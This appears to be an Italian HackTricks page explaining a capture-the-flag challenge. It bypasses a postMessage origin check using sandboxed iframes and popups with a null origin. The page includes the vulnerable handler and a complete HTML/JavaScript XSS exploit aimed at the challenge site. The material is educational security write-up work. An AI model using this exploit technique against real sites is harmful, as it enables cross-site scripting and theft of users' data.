hacktricks/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
2024-02-10 13:03:23 +00:00

92 lines
5.9 KiB
Markdown

# Bypassing SOP con Iframes - 1
<details>
<summary><strong>Impara l'hacking di AWS da zero a esperto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Lavori in una **azienda di sicurezza informatica**? Vuoi vedere la tua **azienda pubblicizzata in HackTricks**? O vuoi avere accesso all'**ultima versione di PEASS o scaricare HackTricks in PDF**? Controlla i [**PACCHETTI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Scopri [**La Famiglia PEASS**](https://opensea.io/collection/the-peass-family), la nostra collezione di esclusive [**NFT**](https://opensea.io/collection/the-peass-family)
* Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com)
* **Unisciti al** [**💬**](https://emojipedia.org/speech-balloon/) [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo Telegram**](https://t.me/peass) o **seguimi** su **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR al [repo hacktricks](https://github.com/carlospolop/hacktricks) e al [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
## Iframes in SOP-1
In questa [**sfida**](https://github.com/terjanq/same-origin-xss) creata da [**NDevTK**](https://github.com/NDevTK) e [**Terjanq**](https://github.com/terjanq) devi sfruttare un XSS nel codice.
```javascript
const identifier = '4a600cd2d4f9aa1cfb5aa786';
onmessage = e => {
const data = e.data;
if (e.origin !== window.origin && data.identifier !== identifier) return;
if (data.type === 'render') {
renderContainer.innerHTML = data.body;
}
}
```
Il problema principale è che la [**pagina principale**](https://so-xss.terjanq.me) utilizza DomPurify per inviare il `data.body`, quindi per inviare i tuoi dati html a quel codice è necessario **bypassare** `e.origin !== window.origin`.
Vediamo la soluzione che propongono.
### Bypass SOP 1 (e.origin === null)
Quando `//example.org` viene incorporato in un **iframe sandboxed**, l'**origine** della pagina sarà **`null`**, cioè **`window.origin === null`**. Quindi, semplicemente incorporando l'iframe tramite `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` potremmo **forzare l'origine `null`**.
Se la pagina fosse **incorporabile**, potresti bypassare quella protezione in questo modo (potrebbe essere necessario impostare i cookie su `SameSite=None`).
### Bypass SOP 2 (window.origin === null)
Il fatto meno conosciuto è che quando il valore **sandbox `allow-popups` è impostato**, la **popup aperta** erediterà tutti gli **attributi sandboxed** a meno che non sia impostato `allow-popups-to-escape-sandbox`.\
Quindi, aprendo una **popup** da un **origine nulla**, anche l'**`window.origin`** all'interno della popup sarà **`null`**.
### Soluzione della sfida
Pertanto, per questa sfida, si potrebbe **creare** un **iframe**, **aprire una popup** alla pagina con l'handler XSS vulnerabile (`/iframe.php`), poiché `window.origin === e.origin` perché entrambi sono `null`, è possibile **inviare un payload che sfrutterà l'XSS**.
Quel **payload** otterrà l'**identificatore** e invierà un **XSS** indietro alla pagina superiore (la pagina che apre la popup), **che** cambierà la **posizione** alla **vulnerabile** `/iframe.php`. Poiché l'identificatore è noto, non importa che la condizione `window.origin === e.origin` non sia soddisfatta (ricorda, l'origine è la **popup** dall'iframe che ha **origine** **`null`**) perché `data.identifier === identifier`. Quindi, l'**XSS verrà attivato di nuovo**, questa volta nell'origine corretta.
```html
<body>
<script>
f = document.createElement('iframe');
// Needed flags
f.sandbox = 'allow-scripts allow-popups allow-top-navigation';
// Second communication with /iframe.php (this is the top page relocated)
// This will execute the alert in the correct origin
const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');
},1000);`.replaceAll('\n',' ');
// Initial communication
// Open /iframe.php in a popup, both iframes and popup will have "null" as origin
// Then, bypass window.origin === e.origin to steal the identifier and communicate
// with the top with the second XSS payload
f.srcdoc = `
<h1>Click me!</h1>
<script>
onclick = e => {
let w = open('https://so-xss.terjanq.me/iframe.php');
onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';
setTimeout(_ => {
w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')
}, 1000);
};
<\/script>
`
document.body.appendChild(f);
</script>
</body>
```
<details>
<summary><strong>Impara l'hacking di AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Lavori in una **azienda di sicurezza informatica**? Vuoi vedere la tua **azienda pubblicizzata in HackTricks**? o vuoi avere accesso all'**ultima versione di PEASS o scaricare HackTricks in PDF**? Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Scopri [**La Famiglia PEASS**](https://opensea.io/collection/the-peass-family), la nostra collezione di esclusive [**NFT**](https://opensea.io/collection/the-peass-family)
* Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com)
* **Unisciti al** [**💬**](https://emojipedia.org/speech-balloon/) [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo Telegram**](https://t.me/peass) o **seguimi** su **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR al [repo hacktricks](https://github.com/carlospolop/hacktricks) e al [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>